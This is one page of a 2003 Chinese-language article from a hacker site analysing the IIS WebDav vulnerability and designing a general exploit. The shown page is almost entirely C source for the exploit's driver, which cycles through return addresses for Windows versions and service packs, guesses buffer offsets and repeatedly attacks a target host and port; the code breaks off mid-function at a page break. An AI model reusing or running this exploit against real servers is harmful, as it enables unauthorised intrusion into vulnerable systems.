| WebDav漏洞简单分析及通用exploit设计 | |||||
作者:eyas 文章来源:CnXHacker.Net 点击数: 更新时间:2003-5-18 ![]() |
return; } else { iStartOffset = iOffset; iEndOffset = iOffset; } } if((iOsType > 2) || (iSP > 3)) { usage(); return; } //brute force if((iOsType == -1) && (iSP == -1)) { memcpy(iRetAddrList, g_iRetAddrList, sizeof(iRetAddrList)); iRetAddrNum = sizeof(iRetAddrList)/sizeof(int); } if((iOsType == -1) && (iSP != -1)) { for(i=0;i<3;i++) iRetAddrList[iRetAddrNum++] = g_iRetAddrList[i][iSP]; } if((iOsType != -1) && (iSP == -1)) { for(i=3;i>=0;i--) iRetAddrList[iRetAddrNum++] = g_iRetAddrList[iOsType][i]; } if((iOsType != -1) && (iSP != -1)) iRetAddrList[iRetAddrNum++] = g_iRetAddrList[iOsType][iSP]; printf( "IP\t\t:%s\n" "Host\t\t:%s\n" "Port\t\t:%d\n" "Offset\t\t:%d-%d\n" "iOffset\t\t:%d\n" "OsType\t\t:%d\n" "SP\t\t:%d\n" "RetAddrNum\t:%d\n",ip,host,iPort,iStartOffset, iEndOffset, iOffset,iOsType, iSP,iRetAddrNum); for(i=0;i<iRetAddrNum;i++) printf("%.8X ", iRetAddrList[i]); printf("\nStart exploit[y/n]:"); if (getchar() == 'n') return; k=0; for(i=iStartOffset;i<=iEndOffset;i++) { //如果是猜测offset,先试23 if(i==StartOffset) i=DefaultOffset; else if((i==DefaultOffset) && (iOffset==0)) continue; printf("try offset:%d\tuse retaddr:0x%.8X\n", i, iRetAddrList[k]); iRet = MakeExploit(iRetAddrList[k], i, host, ip, iPort); switch(iRet) { case ERROR_NOT_IIS: case ERROR_METHOD_NOT_SUPORT: case ERROR_OTHER: exit(1); break; case ERROR_CONNECT_FALIED: printf("can't connect to %s:%d", ip, iPort); //第一次就连接不上,或超出最大重试次数 if( (i==DefaultOffset) || (g_iConnectError > MaxTry) ) { printf(", exit.\n"); exit(1); } printf(", wait for try again.\n"); Sleep(5000); //same offset、retaddr try again i--; break; case ERROR_CONNECT_RESET: iCorrectOffset = i; break; case ERROR_RECV_TIMEOUT: printf("recv buff timeout.Maybe success?\n"); exit(1); break; } if(i==DefaultOffset) i=6; if(iCorrectOffset) break; //getchar(); } if(iCorrectOffset) printf( "-=-= we got correct offset:%d -=-=\n" "-=-= but retaddr %.8X error -=-=\n", iCorrectOffset, iRetAddrList[k]); else return; if(iRetAddrNum<2) return; //尝试其他retaddr 
for(k=1;k<iRetAddrNum;k++) { Sleep(5000); printf("use offset:%d\ttry retaddr:0x%.8X\n", iCorrectOffset, iRetAddrList[k]); iRet = MakeExploit(iRetAddrList[k], iCorrectOffset, host, ip, 80); switch(iRet) { case ERROR_CONNECT_FALIED: printf("can't connect to %s:%d", ip, iPort); if(g_iConnectError > MaxTry) { printf(", eixt.\n"); exit(1); } else printf(", wait for try again.\n"); k--; break; case ERROR_CONNECT_RESET:   上一页 [1] [2] [3] [4] [5] [6] [7] 下一页 |
| 文章录入:IceRiver 责任编辑:IceRiver | |||||